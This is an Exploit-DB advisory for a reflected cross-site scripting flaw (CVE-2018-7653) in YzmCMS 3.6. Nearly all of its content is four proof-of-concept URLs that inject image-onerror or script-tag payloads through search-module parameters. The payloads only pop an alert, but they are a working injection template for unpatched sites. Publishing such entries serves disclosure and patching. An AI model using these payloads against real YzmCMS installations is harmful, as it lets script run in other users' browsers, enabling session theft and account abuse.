YzmCMS 3.6 - Cross-Site Scripting

EDB-ID: 44405
Author: zzw
Published: 2018-04-05
CVE: CVE-2018-7653
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Date: 2018-04-03 
 # Exploit Author: zzw ([email protected]) 
 # Vendor Homepage: http://www.yzmcms.com/ 
 # Software Link: http://www.yzmcms.com/ 
 # Version: 3.6 
 # CVE : CVE-2018-7653 
  
 This is a XSS vulnerability than can attack the users. 
  
 poc: 
  
 http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes  
  
 http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes  
  
 http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes  
  
 http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes

Source: www.exploit-db.com

Exploit Collector

Search Exploit

YzmCMS 3.6 - Cross-Site Scripting